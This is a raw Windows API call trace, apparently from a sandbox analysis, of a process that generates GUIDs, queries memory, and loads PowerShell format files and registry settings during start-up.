	[0286.612] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x77307a2, Data2=0xfc51, Data3=0x4b9e, Data4=([0]=0xaf, [1]=0x50, [2]=0xc, [3]=0x59, [4]=0x66, [5]=0x9d, [6]=0xd5, [7]=0x88))) returned 0x0
	[0286.612] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x9a40ca4e, Data2=0xd49b, Data3=0x4486, Data4=([0]=0x98, [1]=0x30, [2]=0x12, [3]=0xad, [4]=0x6c, [5]=0x3b, [6]=0x42, [7]=0xbd))) returned 0x0
	[0286.612] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x2ef918ee, Data2=0x7841, Data3=0x4d4f, Data4=([0]=0xb3, [1]=0xab, [2]=0x11, [3]=0x8d, [4]=0xd6, [5]=0xa4, [6]=0x33, [7]=0x1d))) returned 0x0
	[0286.612] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x3b3d22dc, Data2=0x7749, Data3=0x44af, Data4=([0]=0xbe, [1]=0xfa, [2]=0x1, [3]=0xc1, [4]=0x4e, [5]=0xac, [6]=0x97, [7]=0x94))) returned 0x0
	[0286.612] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.612] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x4a513fa5, Data2=0x308a, Data3=0x4b96, Data4=([0]=0xa0, [1]=0x28, [2]=0x2, [3]=0xa9, [4]=0xf5, [5]=0x47, [6]=0x3, [7]=0x72))) returned 0x0
	[0286.613] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xce5f01d5, Data2=0xb9e3, Data3=0x4ed1, Data4=([0]=0x85, [1]=0xc3, [2]=0x1, [3]=0x93, [4]=0xe4, [5]=0xdf, [6]=0x8b, [7]=0x66))) returned 0x0
	[0286.613] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xd34aeab4, Data2=0x341, Data3=0x4412, Data4=([0]=0x8e, [1]=0x3e, [2]=0x9c, [3]=0xfa, [4]=0x1f, [5]=0xb9, [6]=0x2e, [7]=0xa0))) returned 0x0
	[0286.613] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xa0dfcd46, Data2=0x9fc7, Data3=0x4969, Data4=([0]=0x89, [1]=0x5f, [2]=0xb5, [3]=0xf2, [4]=0xeb, [5]=0xe8, [6]=0xa6, [7]=0xb9))) returned 0x0
	[0286.613] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x2d01e228, Data2=0x3f1e, Data3=0x47f6, Data4=([0]=0x9a, [1]=0xb9, [2]=0xc, [3]=0x60, [4]=0x84, [5]=0x9b, [6]=0xd1, [7]=0xbf))) returned 0x0
	[0286.613] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x56f93a5e, Data2=0xc682, Data3=0x4cea, Data4=([0]=0x9d, [1]=0xbb, [2]=0x2d, [3]=0x22, [4]=0x67, [5]=0x2f, [6]=0x30, [7]=0xf8))) returned 0x0
	[0286.613] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xe9ce60c0, Data2=0x602e, Data3=0x4a1c, Data4=([0]=0xa6, [1]=0x82, [2]=0xdd, [3]=0xf1, [4]=0xdb, [5]=0x58, [6]=0x9, [7]=0x50))) returned 0x0
	[0286.613] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x70eb728f, Data2=0x33ff, Data3=0x45be, Data4=([0]=0xb5, [1]=0x68, [2]=0xe7, [3]=0x75, [4]=0x70, [5]=0xaf, [6]=0x5d, [7]=0xf9))) returned 0x0
	[0286.614] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x256674ec, Data2=0xb766, Data3=0x4ef2, Data4=([0]=0xb6, [1]=0xcf, [2]=0x25, [3]=0x4e, [4]=0x1a, [5]=0xd, [6]=0xb9, [7]=0x69))) returned 0x0
	[0286.614] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x2c93b36b, Data2=0x6c79, Data3=0x4fb8, Data4=([0]=0x92, [1]=0x3, [2]=0x38, [3]=0x6, [4]=0x31, [5]=0x54, [6]=0xf7, [7]=0x5c))) returned 0x0
	[0286.614] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x559b7fd1, Data2=0xe656, Data3=0x481d, Data4=([0]=0x9f, [1]=0xc0, [2]=0xed, [3]=0x27, [4]=0x7a, [5]=0xdc, [6]=0xf9, [7]=0xf5))) returned 0x0
	[0286.614] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xd397ac63, Data2=0x2caf, Data3=0x4437, Data4=([0]=0x88, [1]=0x26, [2]=0xb7, [3]=0x59, [4]=0xaf, [5]=0x77, [6]=0x77, [7]=0xe3))) returned 0x0
	[0286.614] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.614] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.614] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.615] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x6793086a, Data2=0x592d, Data3=0x4eb4, Data4=([0]=0x97, [1]=0xad, [2]=0x52, [3]=0xb, [4]=0x45, [5]=0x3f, [6]=0xd0, [7]=0x1a))) returned 0x0
	[0286.615] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xd1247e03, Data2=0x7a74, Data3=0x44ce, Data4=([0]=0xac, [1]=0xaa, [2]=0x93, [3]=0x1e, [4]=0xdf, [5]=0xbc, [6]=0x58, [7]=0x9e))) returned 0x0
	[0286.615] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x8abf382e, Data2=0xdda5, Data3=0x4e26, Data4=([0]=0x91, [1]=0x20, [2]=0x46, [3]=0xf2, [4]=0xa, [5]=0xea, [6]=0x4e, [7]=0xd9))) returned 0x0
	[0286.615] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x635c36af, Data2=0xf7cd, Data3=0x4d34, Data4=([0]=0x9f, [1]=0x6a, [2]=0x3e, [3]=0xb4, [4]=0xeb, [5]=0x0, [6]=0x8d, [7]=0x20))) returned 0x0
	[0286.615] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x736a9e43, Data2=0x5d58, Data3=0x4a67, Data4=([0]=0x9b, [1]=0xa7, [2]=0xa6, [3]=0x93, [4]=0x16, [5]=0x18, [6]=0xef, [7]=0xbb))) returned 0x0
	[0286.615] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xb9e89b80, Data2=0x534d, Data3=0x4ad2, Data4=([0]=0x8f, [1]=0x99, [2]=0x50, [3]=0x73, [4]=0xd5, [5]=0x72, [6]=0x86, [7]=0xc4))) returned 0x0
	[0286.615] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x84a0347f, Data2=0xb215, Data3=0x4ee4, Data4=([0]=0x9f, [1]=0xf4, [2]=0x6a, [3]=0x9c, [4]=0x8c, [5]=0x7f, [6]=0x6c, [7]=0x80))) returned 0x0
	[0286.616] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x3e95200f, Data2=0xea76, Data3=0x4795, Data4=([0]=0xb6, [1]=0xc9, [2]=0x19, [3]=0x82, [4]=0x42, [5]=0x4d, [6]=0x44, [7]=0x40))) returned 0x0
	[0286.616] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xa78a1823, Data2=0xbe0b, Data3=0x417a, Data4=([0]=0x88, [1]=0x4a, [2]=0x28, [3]=0xd7, [4]=0x23, [5]=0x6, [6]=0xe3, [7]=0xab))) returned 0x0
	[0286.616] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x3c2bb268, Data2=0xda0c, Data3=0x4cd3, Data4=([0]=0x95, [1]=0x8f, [2]=0xf5, [3]=0x6c, [4]=0x40, [5]=0x92, [6]=0x1e, [7]=0x1f))) returned 0x0
	[0286.616] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xce062895, Data2=0xba33, Data3=0x467b, Data4=([0]=0xa5, [1]=0xe5, [2]=0xca, [3]=0x86, [4]=0x42, [5]=0xff, [6]=0x4d, [7]=0x4f))) returned 0x0
	[0286.616] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x632f0170, Data2=0xa004, Data3=0x4cb9, Data4=([0]=0x9c, [1]=0x95, [2]=0x32, [3]=0xb1, [4]=0x75, [5]=0x17, [6]=0xc8, [7]=0xce))) returned 0x0
	[0286.616] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x13258fdb, Data2=0x2d6a, Data3=0x4d84, Data4=([0]=0xba, [1]=0x72, [2]=0x38, [3]=0x77, [4]=0xea, [5]=0xec, [6]=0x25, [7]=0x4e))) returned 0x0
	[0286.616] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.617] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x5eea9940, Data2=0x8e0, Data3=0x4df1, Data4=([0]=0x99, [1]=0xca, [2]=0x42, [3]=0x55, [4]=0xe3, [5]=0x75, [6]=0x11, [7]=0x2c))) returned 0x0
	[0286.617] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.617] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.618] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x4c6ea72e, Data2=0xde5a, Data3=0x40b0, Data4=([0]=0xa8, [1]=0x8c, [2]=0xa0, [3]=0xbe, [4]=0x29, [5]=0x4a, [6]=0x47, [7]=0x62))) returned 0x0
	[0286.618] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.618] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xa0be6e2b, Data2=0x1359, Data3=0x444c, Data4=([0]=0xa7, [1]=0x4a, [2]=0xf, [3]=0xc2, [4]=0x73, [5]=0xbc, [6]=0xd0, [7]=0x42))) returned 0x0
	[0286.618] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x79138ee7, Data2=0xe59d, Data3=0x4b4d, Data4=([0]=0x8b, [1]=0x75, [2]=0x79, [3]=0xf0, [4]=0x3d, [5]=0x18, [6]=0x1d, [7]=0x32))) returned 0x0
	[0286.619] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xda1deb54, Data2=0x2310, Data3=0x483d, Data4=([0]=0xb0, [1]=0xb1, [2]=0xa5, [3]=0x36, [4]=0xed, [5]=0xbd, [6]=0x29, [7]=0x8a))) returned 0x0
	[0286.619] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xdd7524b, Data2=0xb421, Data3=0x4ba3, Data4=([0]=0xba, [1]=0xb2, [2]=0x5a, [3]=0x1c, [4]=0xcd, [5]=0xfb, [6]=0x49, [7]=0x67))) returned 0x0
	[0286.619] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x7d10ebc4, Data2=0x5eec, Data3=0x4443, Data4=([0]=0xa5, [1]=0x28, [2]=0xa0, [3]=0x57, [4]=0x9, [5]=0x23, [6]=0x56, [7]=0x83))) returned 0x0
	[0286.619] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x56fd9f58, Data2=0x17cf, Data3=0x442a, Data4=([0]=0x84, [1]=0x49, [2]=0x58, [3]=0x5c, [4]=0xc8, [5]=0x4c, [6]=0xf4, [7]=0xfb))) returned 0x0
	[0286.619] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x346b3211, Data2=0x2104, Data3=0x4e12, Data4=([0]=0xb9, [1]=0xdc, [2]=0xe6, [3]=0xf7, [4]=0xb0, [5]=0xa5, [6]=0xa4, [7]=0x33))) returned 0x0
	[0286.619] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.619] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xc7976d4b, Data2=0x691f, Data3=0x49b3, Data4=([0]=0x96, [1]=0x23, [2]=0xee, [3]=0xca, [4]=0xb7, [5]=0xc, [6]=0x3c, [7]=0xf2))) returned 0x0
	[0286.620] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x6fbfded1, Data2=0x23d0, Data3=0x48d9, Data4=([0]=0xab, [1]=0xb5, [2]=0xc0, [3]=0x4, [4]=0x5d, [5]=0x93, [6]=0xeb, [7]=0xc3))) returned 0x0
	[0286.620] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x179d697e, Data2=0x5aa1, Data3=0x45bc, Data4=([0]=0xa7, [1]=0x4a, [2]=0x2e, [3]=0xa, [4]=0x21, [5]=0x6b, [6]=0x66, [7]=0x77))) returned 0x0
	[0286.620] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xd70fceac, Data2=0xc685, Data3=0x407b, Data4=([0]=0x9a, [1]=0x34, [2]=0xe3, [3]=0x1b, [4]=0xa3, [5]=0xa9, [6]=0x4, [7]=0x6))) returned 0x0
	[0286.620] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xbc7d3b18, Data2=0xfba0, Data3=0x4e98, Data4=([0]=0x82, [1]=0x22, [2]=0x10, [3]=0x31, [4]=0xed, [5]=0xc4, [6]=0x0, [7]=0x35))) returned 0x0
	[0286.620] VirtualQuery (in: lpAddress=0x12bd00, lpBuffer=0x12cbc0, dwLength=0x30 | out: lpBuffer=0x12cbc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.620] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x72097076, Data2=0x926, Data3=0x4e42, Data4=([0]=0x88, [1]=0x2d, [2]=0x85, [3]=0xf2, [4]=0x74, [5]=0xe9, [6]=0x66, [7]=0xd8))) returned 0x0
	[0286.620] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x5a8a269a, Data2=0x4b02, Data3=0x4df7, Data4=([0]=0x98, [1]=0x4, [2]=0x54, [3]=0x1, [4]=0xb0, [5]=0x22, [6]=0x0, [7]=0x16))) returned 0x0
	[0286.621] VirtualQuery (in: lpAddress=0x12bd70, lpBuffer=0x12cc30, dwLength=0x30 | out: lpBuffer=0x12cc30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.621] VirtualQuery (in: lpAddress=0x12bd70, lpBuffer=0x12cc30, dwLength=0x30 | out: lpBuffer=0x12cc30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.621] VirtualQuery (in: lpAddress=0x12bd70, lpBuffer=0x12cc30, dwLength=0x30 | out: lpBuffer=0x12cc30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.621] VirtualQuery (in: lpAddress=0x12bd70, lpBuffer=0x12cc30, dwLength=0x30 | out: lpBuffer=0x12cc30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.621] SetErrorMode (uMode=0x1) returned 0x1
	[0286.621] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0286.621] GetFileType (hFile=0x300) returned 0x1
	[0286.621] SetErrorMode (uMode=0x1) returned 0x1
	[0286.621] GetFileType (hFile=0x300) returned 0x1
	[0286.622] ReadFile (in: hFile=0x300, lpBuffer=0x319c810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x319c810*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.622] ReadFile (in: hFile=0x300, lpBuffer=0x319c810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x319c810*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.622] ReadFile (in: hFile=0x300, lpBuffer=0x319c810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x319c810*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.622] ReadFile (in: hFile=0x300, lpBuffer=0x319c810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x319c810*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.622] ReadFile (in: hFile=0x300, lpBuffer=0x319c810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x319c810*, lpNumberOfBytesRead=0x12d098*=0x8b4, lpOverlapped=0x0) returned 1
	[0286.622] ReadFile (in: hFile=0x300, lpBuffer=0x319bc2c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x319bc2c*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0286.622] ReadFile (in: hFile=0x300, lpBuffer=0x319c810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x319c810*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0286.623] SetErrorMode (uMode=0x1) returned 0x1
	[0286.623] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d040 | out: lpFileInformation=0x12d040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0286.623] SetErrorMode (uMode=0x1) returned 0x1
	[0286.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0286.623] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d128 | out: phkResult=0x12d128*=0x300) returned 0x0
	[0286.623] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d0ac, lpData=0x0, lpcbData=0x12d0a8*=0x0 | out: lpType=0x12d0ac*=0x1, lpData=0x0, lpcbData=0x12d0a8*=0x56) returned 0x0
	[0286.623] CoTaskMemAlloc (cb=0x5a) returned 0x271660
	[0286.623] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d07c, lpData=0x271660, lpcbData=0x12d078*=0x56 | out: lpType=0x12d07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d078*=0x56) returned 0x0
	[0286.623] CoTaskMemFree (pv=0x271660) 
	[0286.623] RegCloseKey (hKey=0x300) returned 0x0
	[0286.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0286.624] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x731bf40a, Data2=0xa784, Data3=0x4bb5, Data4=([0]=0xb8, [1]=0x80, [2]=0x2c, [3]=0x13, [4]=0xaa, [5]=0xa, [6]=0x88, [7]=0xa3))) returned 0x0
	[0286.624] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x68f7c143, Data2=0x6f16, Data3=0x4121, Data4=([0]=0xb4, [1]=0xca, [2]=0x4b, [3]=0x2a, [4]=0xd6, [5]=0xf3, [6]=0x1e, [7]=0xde))) returned 0x0
	[0286.624] SetErrorMode (uMode=0x1) returned 0x1
	[0286.624] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0286.624] GetFileType (hFile=0x300) returned 0x1
	[0286.624] SetErrorMode (uMode=0x1) returned 0x1
	[0286.624] GetFileType (hFile=0x300) returned 0x1
	[0286.624] ReadFile (in: hFile=0x300, lpBuffer=0x31da5f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x31da5f8*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.625] ReadFile (in: hFile=0x300, lpBuffer=0x31da5f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x31da5f8*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.625] ReadFile (in: hFile=0x300, lpBuffer=0x31da5f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x31da5f8*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.625] ReadFile (in: hFile=0x300, lpBuffer=0x31da5f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x31da5f8*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.625] ReadFile (in: hFile=0x300, lpBuffer=0x31da5f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x31da5f8*, lpNumberOfBytesRead=0x12d098*=0xe98, lpOverlapped=0x0) returned 1
	[0286.625] ReadFile (in: hFile=0x300, lpBuffer=0x31d9bf8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x31d9bf8*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0286.625] ReadFile (in: hFile=0x300, lpBuffer=0x31da5f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x31da5f8*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0286.625] SetErrorMode (uMode=0x1) returned 0x1
	[0286.626] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d040 | out: lpFileInformation=0x12d040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0286.626] SetErrorMode (uMode=0x1) returned 0x1
	[0286.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0286.626] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d128 | out: phkResult=0x12d128*=0x300) returned 0x0
	[0286.626] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d0ac, lpData=0x0, lpcbData=0x12d0a8*=0x0 | out: lpType=0x12d0ac*=0x1, lpData=0x0, lpcbData=0x12d0a8*=0x56) returned 0x0
	[0286.626] CoTaskMemAlloc (cb=0x5a) returned 0x271660
	[0286.626] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d07c, lpData=0x271660, lpcbData=0x12d078*=0x56 | out: lpType=0x12d07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d078*=0x56) returned 0x0
	[0286.626] CoTaskMemFree (pv=0x271660) 
	[0286.626] RegCloseKey (hKey=0x300) returned 0x0
